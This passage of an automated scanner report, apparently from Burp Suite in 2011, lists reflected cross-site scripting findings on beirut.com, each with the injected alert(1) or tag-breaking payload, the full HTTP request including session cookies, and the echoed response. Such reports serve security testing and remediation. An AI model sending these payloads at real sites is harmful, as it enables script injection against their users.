User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:47:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internet/Recreation3bec0'-alert(1)-'b5798d3d725';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.649. http://www.beirut.com/Online-Internet/Social-and-Activist/3727967600 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Social-and-Activist/3727967600

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 466d8"><a>19ca3df0849 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet466d8"><a>19ca3df0849/Social-and-Activist/3727967600 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:36:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet466d8"><a>19ca3df0849">
...[SNIP]...

4.650. http://www.beirut.com/Online-Internet/Social-and-Activist/3727967600 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Social-and-Activist/3727967600

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b908'-alert(1)-'d197f1277bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet7b908'-alert(1)-'d197f1277bf/Social-and-Activist/3727967600 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:45:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Online-Internet7b908'-alert(1)-'d197f1277bf/Social-and-Activist';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.651. http://www.beirut.com/Online-Internet/Social-and-Activist/3727967600 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Social-and-Activist/3727967600

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 779ba'-alert(1)-'0772e8c976f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Social-and-Activist779ba'-alert(1)-'0772e8c976f/3727967600 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:50:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Online-Internet/Social-and-Activist779ba'-alert(1)-'0772e8c976f';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.652. http://www.beirut.com/Online-Internet/Technology/8023704728 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Technology/8023704728

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5725"><a>58eaad564f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internetf5725"><a>58eaad564f9/Technology/8023704728 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:31:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internetf5725"><a>58eaad564f9">
...[SNIP]...

4.653. http://www.beirut.com/Online-Internet/Technology/8023704728 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Technology/8023704728

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddaa6'-alert(1)-'a1bc90a0b93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internetddaa6'-alert(1)-'a1bc90a0b93/Technology/8023704728 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:36:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Online-Internetddaa6'-alert(1)-'a1bc90a0b93/Technology';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.654. http://www.beirut.com/Online-Internet/Technology/8023704728 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Technology/8023704728

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58d1b'-alert(1)-'1ecd780bcc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Technology58d1b'-alert(1)-'1ecd780bcc8/8023704728 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:40:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Online-Internet/Technology58d1b'-alert(1)-'1ecd780bcc8';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.655. http://www.beirut.com/Online-Internet/Tourism-and-Guides/0054751592 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Tourism-and-Guides/0054751592

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9052e"><a>75c99e9fd70 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet9052e"><a>75c99e9fd70/Tourism-and-Guides/0054751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:30:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet9052e"><a>75c99e9fd70">
...[SNIP]...

4.656. http://www.beirut.com/Online-Internet/Tourism-and-Guides/0054751592 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Tourism-and-Guides/0054751592

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88c91'-alert(1)-'3a787f3de24 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet88c91'-alert(1)-'3a787f3de24/Tourism-and-Guides/0054751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:40:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Online-Internet88c91'-alert(1)-'3a787f3de24/Tourism-and-Guides';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.657. http://www.beirut.com/Online-Internet/Tourism-and-Guides/0054751592 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Tourism-and-Guides/0054751592

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16a68'-alert(1)-'b1ef406af57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Tourism-and-Guides16a68'-alert(1)-'b1ef406af57/0054751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:46:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Online-Internet/Tourism-and-Guides16a68'-alert(1)-'b1ef406af57';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.658. http://www.beirut.com/Online-Internet/Weather-Environment/8954751592 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Weather-Environment/8954751592

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33a22"><a>16f65d79cc3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet33a22"><a>16f65d79cc3/Weather-Environment/8954751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:28:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet33a22"><a>16f65d79cc3">
...[SNIP]...

4.659. http://www.beirut.com/Online-Internet/Weather-Environment/8954751592 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Weather-Environment/8954751592

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d201f'-alert(1)-'9caddc414c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internetd201f'-alert(1)-'9caddc414c0/Weather-Environment/8954751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:40:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Online-Internetd201f'-alert(1)-'9caddc414c0/Weather-Environment';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.660. http://www.beirut.com/Online-Internet/Weather-Environment/8954751592 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Weather-Environment/8954751592

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1631b'-alert(1)-'b7de9628bc4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Weather-Environment1631b'-alert(1)-'b7de9628bc4/8954751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:46:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Online-Internet/Weather-Environment1631b'-alert(1)-'b7de9628bc4';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.661. http://www.beirut.com/Recreations/Amusement-Centers/478536232 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Recreations/Amusement-Centers/478536232

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f16db"><a>3891791e285 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreationsf16db"><a>3891791e285/Amusement-Centers/478536232 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
